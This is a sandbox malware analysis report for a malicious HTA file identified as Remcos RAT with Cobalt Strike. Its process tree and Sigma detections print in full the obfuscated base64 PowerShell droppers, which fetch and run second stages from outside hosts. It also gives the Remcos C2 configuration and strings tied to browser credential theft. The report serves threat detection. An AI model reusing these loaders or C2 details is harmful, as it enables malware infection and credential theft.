Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
creamkissingthingswithcreambananapackagecreamy.hta

Overview

General Information

Sample name:creamkissingthingswithcreambananapackagecreamy.hta
Analysis ID:1574256
MD5:049640aa09b45f8f374ec9fff6e272e5
SHA1:ca0990ea3db24491c5a5ce408b921383b0d74db8
SHA256:277bce05fe87b2c2edd725dc6bc75c98a9f3d3fc68159a65471625009fe0e9e7
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7156 cmdline: mshta.exe "C:\Users\user\Desktop\creamkissingthingswithcreambananapackagecreamy.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 5260 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1488 cmdline: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 5396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 6500 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 6556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 6284 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["newglobalfucntioninside.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-PVMSPM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
creamkissingthingswithcreambananapackagecreamy.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 20 entries
          SourceRuleDescriptionAuthorStrings
          12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                12.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6b6f8:$a1: Remcos restarted by watchdog!
                • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                12.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x65a04:$str_b2: Executing file:
                • 0x6683c:$str_b3: GetDirectListeningPort
                • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x66380:$str_b7: \update.vbs
                • 0x65a2c:$str_b9: Downloaded file:
                • 0x65a18:$str_b10: Downloading file:
                • 0x65abc:$str_b12: Failed to upload file:
                • 0x66804:$str_b13: StartForward
                • 0x66824:$str_b14: StopForward
                • 0x662d8:$str_b15: fso.DeleteFile "
                • 0x6626c:$str_b16: On Error Resume Next
                • 0x66308:$str_b17: fso.DeleteFolder "
                • 0x65aac:$str_b18: Uploaded file:
                • 0x65a6c:$str_b19: Unable to delete:
                • 0x662a0:$str_b20: while fso.FileExists("
                • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                Click to see the 19 entries
                SourceRuleDescriptionAuthorStrings
                amsi32_6556.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi32_6556.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0Z
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" 